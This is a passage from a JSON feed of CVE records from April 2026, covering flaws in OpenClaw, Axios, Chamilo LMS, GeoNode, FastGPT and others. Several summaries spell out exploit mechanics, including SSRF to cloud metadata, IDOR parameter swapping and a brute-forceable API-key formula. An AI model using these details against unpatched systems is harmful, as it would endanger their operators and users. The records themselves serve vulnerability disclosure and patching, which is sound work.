Was ZDI-CAN-29312.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00276,"ranking_epss":0.51021,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-jq4x-98m3-ggq6","https://www.zerodayinitiative.com/advisories/ZDI-26-227/"],"published_time":"2026-04-11T01:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3690","summary":"OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00135,"ranking_epss":0.33179,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-vvjh-f6p9-5vcf","https://www.zerodayinitiative.com/advisories/ZDI-26-228/"],"published_time":"2026-04-11T01:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33118","summary":"Microsoft Edge (Chromium-based) Spoofing Vulnerability","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1971,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33118"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33119","summary":"User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform 
spoofing over a network.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00061,"ranking_epss":0.18985,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119"],"published_time":"2026-04-10T22:16:21","vendor":"microsoft","product":"edge","version":null},{"cve_id":"CVE-2026-40198","summary":"Net::CIDR::Lite versions before 0.23 for Perl does not validate IPv6 group count, which may allow IP ACL bypass.\n\n_pack_ipv6() does not check that uncompressed IPv6 addresses (without ::) have exactly 8 hex groups. Inputs like \"abcd\", \"1:2:3\", or \"1:2:3:4:5:6:7\" are accepted and produce packed values of wrong length (3, 7, or 15 bytes instead of 17).\n\nThe packed values are used internally for mask and comparison operations. find() and bin_find() use Perl string comparison (lt/gt) on these values, and comparing strings of different lengths gives wrong results. This can cause find() to incorrectly report an address as inside or outside a range.\n\nExample:\n\n  my $cidr = Net::CIDR::Lite->new(\"::/8\");\n  $cidr->find(\"1:2:3\");  # invalid input, incorrectly returns true\n\nThis is the same class of input validation issue as CVE-2021-47154 (IPv4 leading zeros) previously fixed in this module.\n\nSee also CVE-2026-40199, a related issue in the same function affecting IPv4 mapped IPv6 addresses.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.12143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/stigtsp/Net-CIDR-Lite/commit/25d65f85dbe4885959a10471725ec9d250a589c3.patch","https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.23/changes","https://www.cve.org/CVERecord?id=CVE-2026-40199"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40199","summary":"Net::CIDR::Lite versions before 0.23 for 
Perl mishandles IPv4 mapped IPv6 addresses, which may allow IP ACL bypass.\n\n_pack_ipv6() includes the sentinel byte from _pack_ipv4() when building the packed representation of IPv4 mapped addresses like ::ffff:192.168.1.1. This produces an 18 byte value instead of 17 bytes, misaligning the IPv4 part of the address.\n\nThe wrong length causes incorrect results in mask operations (bitwise AND truncates to the shorter operand) and in find() / bin_find() which use Perl string comparison (lt/gt). This can cause find() to incorrectly match or miss addresses.\n\nExample:\n\n  my $cidr = Net::CIDR::Lite->new(\"::ffff:192.168.1.0/120\");\n  $cidr->find(\"::ffff:192.168.2.0\");  # incorrectly returns true\n\nThis is triggered by valid RFC 4291 IPv4 mapped addresses (::ffff:x.x.x.x).\n\nSee also CVE-2026-40198, a related issue in the same function affecting malformed IPv6 addresses.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07592,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/stigtsp/Net-CIDR-Lite/commit/b7166b1fa17b3b14b4c795ace5b3fbf71a0bd04a.patch","https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.23/changes","https://www.cve.org/CVERecord?id=CVE-2026-40198"],"published_time":"2026-04-10T22:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5724","summary":"The frontend gRPC server's streaming interceptor chain did not include the authorization interceptor. When a ClaimMapper and Authorizer are configured, unary RPCs enforce authentication and authorization, but the streaming AdminService/StreamWorkflowReplicationMessages endpoint accepted requests without credentials. This endpoint is registered on the same port as WorkflowService and cannot be disabled independently. An attacker with network access to the frontend port could open the replication stream without authentication. 
Data exfiltration is possible, but only when a replication target is correctly configured and the attacker has knowledge of the cluster configuration, as the history service validates cluster IDs and peer membership before returning replication data.\n\nTemporal Cloud is not affected.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.001,"ranking_epss":0.27649,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/temporalio/temporal/releases/tag/v1.28.4","https://github.com/temporalio/temporal/releases/tag/v1.29.6","https://github.com/temporalio/temporal/releases/tag/v1.30.4"],"published_time":"2026-04-10T21:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40191","summary":"ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. Prior to 5.0.4-beta-1f46165, ClearanceKit's Endpoint Security event handler only checked the source path of dual-path file operations against File Access Authorization (FAA) rules and App Jail policies. The destination path was ignored entirely. This allowed any local process to bypass file-access protection by using rename, link, copyfile, exchangedata, or clone operations to place or replace files inside protected directories. This vulnerability is fixed in 5.0.4-beta-1f46165.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.02107,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craigjbass/clearancekit/releases/tag/v5.0.4-1f46165","https://github.com/craigjbass/clearancekit/security/advisories/GHSA-92f3-38m7-579h"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40194","summary":"phpseclib is a PHP secure communications library. 
Prior to 3.0.51, 2.0.53, and 1.0.28, phpseclib\\Net\\SSH2::get_binary_packet() uses PHP's != operator to compare a received SSH packet HMAC against the locally computed HMAC. != on equal-length binary strings in PHP uses memcmp(), which short-circuits on the first differing byte. This is a real variable-time comparison (CWE-208), proven by scaling benchmarks. This vulnerability is fixed in 3.0.51, 2.0.53, and 1.0.28.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.00992,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac","https://github.com/phpseclib/phpseclib/releases/tag/1.0.28","https://github.com/phpseclib/phpseclib/releases/tag/2.0.53","https://github.com/phpseclib/phpseclib/releases/tag/3.0.51","https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx","https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40242","summary":"Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.17.3, the /api/templates/fetch endpoint accepts a caller-supplied url parameter and performs a server-side HTTP GET request to that URL without authentication and without URL scheme or host validation. The server's response is returned directly to the caller. This constitutes an unauthenticated SSRF vulnerability affecting any publicly reachable Arcane instance. 
This vulnerability is fixed in 1.17.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04533,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/getarcaneapp/arcane/releases/tag/v1.17.3","https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj","https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40252","summary":"FastGPT is an AI Agent building platform. Prior to 4.14.10.4, Broken Access Control vulnerability (IDOR/BOLA) allows any authenticated team to access and execute applications belonging to other teams by supplying a foreign appId. While the API correctly validates the team token, it does not verify that the requested application belongs to the authenticated team. This leads to cross-tenant data exposure and unauthorized execution of private AI workflows. This vulnerability is fixed in 4.14.10.4.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00057,"ranking_epss":0.17791,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/labring/FastGPT/releases/tag/v4.14.10.4","https://github.com/labring/FastGPT/security/advisories/GHSA-gc8m-w37w-24hw"],"published_time":"2026-04-10T21:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40190","summary":"LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. 
This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.","cvss":5.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.6,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11975,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252"],"published_time":"2026-04-10T20:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40178","summary":"ajenti.plugin.core defines all necessary core elements to allow Ajenti to run properly. Prior to 0.112, if the 2FA was activated, it was possible during a short moment after the authentication of a user to bypass its authentication. This vulnerability is fixed in 0.112.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00073,"ranking_epss":0.22038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ajenti/ajenti/security/advisories/GHSA-8647-755q-fw9p"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40180","summary":"Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to 2.16.0 and 2.15.0-lts, the unzip() method in ApicurioCodegenWrapper.java extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as new File(toOutputDir, entry.getName()) and the content is written immediately. A malicious ZIP archive containing entries with path traversal sequences (e.g., ../../malicious.java) would write files outside the target directory. 
This vulnerability is fixed in 2.16.0 and 2.15.0-lts.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.7,"epss":0.00044,"ranking_epss":0.13258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0","https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239","https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q","https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40184","summary":"TREK is a collaborative travel planner. Prior to 2.7.2, TREK served uploaded photos without requiring authentication. This vulnerability is fixed in 2.7.2.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0005,"ranking_epss":0.15394,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179","https://github.com/mauriceboe/TREK/releases/tag/v2.7.2","https://github.com/mauriceboe/TREK/security/advisories/GHSA-wxx3-84fc-mrx2"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40185","summary":"TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. 
This vulnerability is fixed in 2.7.2.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179","https://github.com/mauriceboe/TREK/releases/tag/v2.7.2","https://github.com/mauriceboe/TREK/security/advisories/GHSA-pcr3-6647-jh72"],"published_time":"2026-04-10T20:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40188","summary":"goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06814,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744","https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4","https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx","https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"],"published_time":"2026-04-10T20:16:23","vendor":"goshs","product":"goshs","version":null},{"cve_id":"CVE-2026-40189","summary":"goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces the documented per-folder .goshs ACL/basic-auth mechanism for directory listings and file reads, but it does not enforce the same authorization checks for state-changing routes. An unauthenticated attacker can upload files with PUT, upload files with multipart POST /upload, create directories with ?mkdir, and delete files with ?delete inside a .goshs-protected directory. 
By deleting the .goshs file itself, the attacker can remove the folder's auth policy and then access previously protected content without credentials. This results in a critical authorization bypass affecting confidentiality, integrity, and availability. This vulnerability is fixed in 2.0.0-beta.4.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00105,"ranking_epss":0.28469,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/patrickhener/goshs/commit/f212c4f4a126556bab008f79758e21a839ef2c0f","https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4","https://github.com/patrickhener/goshs/security/advisories/GHSA-wvhv-qcqf-f3cx","https://github.com/patrickhener/goshs/security/advisories/GHSA-wvhv-qcqf-f3cx"],"published_time":"2026-04-10T20:16:23","vendor":"goshs","product":"goshs","version":null},{"cve_id":"CVE-2026-39921","summary":"GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability that allows authenticated users with document upload permissions to trigger arbitrary outbound HTTP requests by providing a malicious URL via the doc_url parameter during document upload. 
Attackers can supply URLs pointing to internal network targets, loopback addresses, RFC1918 addresses, or cloud metadata services to cause the server to make requests to internal resources without SSRF mitigations such as private IP filtering or redirect validation.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.0003,"ranking_epss":0.08375,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/GeoNode/geonode/releases/tag/4.4.5","https://github.com/GeoNode/geonode/releases/tag/5.0.2","https://www.vulncheck.com/advisories/geonode-ssrf-via-document-upload"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39922","summary":"GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability in the service registration endpoint that allows authenticated attackers to trigger outbound network requests to arbitrary URLs by submitting a crafted service URL during form validation. Attackers can probe internal network targets including loopback addresses, RFC1918 private IP ranges, link-local addresses, and cloud metadata services by exploiting insufficient URL validation in the WMS service handler without private IP filtering or allowlist enforcement.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00036,"ranking_epss":0.10664,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/GeoNode/geonode/releases/tag/4.4.5","https://github.com/GeoNode/geonode/releases/tag/5.0.2","https://www.vulncheck.com/advisories/geonode-ssrf-via-service-registration"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40168","summary":"Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. 
Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1214,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/gitroomhq/postiz-app/commit/30e8b777098157362769226d1b46d83ad616cb06","https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.5","https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww","https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww"],"published_time":"2026-04-10T20:16:22","vendor":"gitroom","product":"postiz","version":null},{"cve_id":"CVE-2026-40175","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). 
This vulnerability is fixed in 1.15.0 and 0.3.1.","cvss":10.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":10.0,"cvss_v4":null,"epss":0.00239,"ranking_epss":0.46966,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1","https://github.com/axios/axios/pull/10660","https://github.com/axios/axios/pull/10688","https://github.com/axios/axios/releases/tag/v0.31.0","https://github.com/axios/axios/releases/tag/v1.15.0","https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx","https://github.com/axios/axios/pull/10660#issuecomment-4224168081"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40177","summary":"ajenti.plugin.core defines all necessary core elements to allow Ajenti to run properly. Prior to 0.112, if the 2FA was activated, it was possible to bypass the password authentication. This vulnerability is fixed in 0.112.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00073,"ranking_epss":0.22038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ajenti/ajenti/security/advisories/GHSA-3mcx-6wxm-qr8v"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30232","summary":"Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. 
This vulnerability is fixed in 4.8.5.","cvss":7.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":7.8,"epss":0.00041,"ranking_epss":0.12288,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv"],"published_time":"2026-04-10T20:16:21","vendor":"depomo","product":"chartbrew","version":null},{"cve_id":"CVE-2026-32252","summary":"Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, \"updateAny\", \"chart\") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06149,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj"],"published_time":"2026-04-10T20:16:21","vendor":"depomo","product":"chartbrew","version":null},{"cve_id":"CVE-2026-3446","summary":"When calling base64.b64decode() or related functions the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. 
This can lead to data being accepted which may be processed differently by other implementations. Use \"validate=True\" to enable stricter processing of base64 data.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.0,"epss":0.00023,"ranking_epss":0.06011,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474","https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e","https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa","https://github.com/python/cpython/issues/145264","https://github.com/python/cpython/pull/145267","https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/"],"published_time":"2026-04-10T19:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33708","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33710","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). 
The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09","https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33736","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33737","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With LIBXML_NOENT flag, arbitrary server files can be read. 
This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e","https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33698","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00053,"ranking_epss":0.16447,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33702","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress — including score, status, completion, and time — without verifying that the requesting user matches the target user ID. 
Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09638,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f","https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33703","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33704","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. 
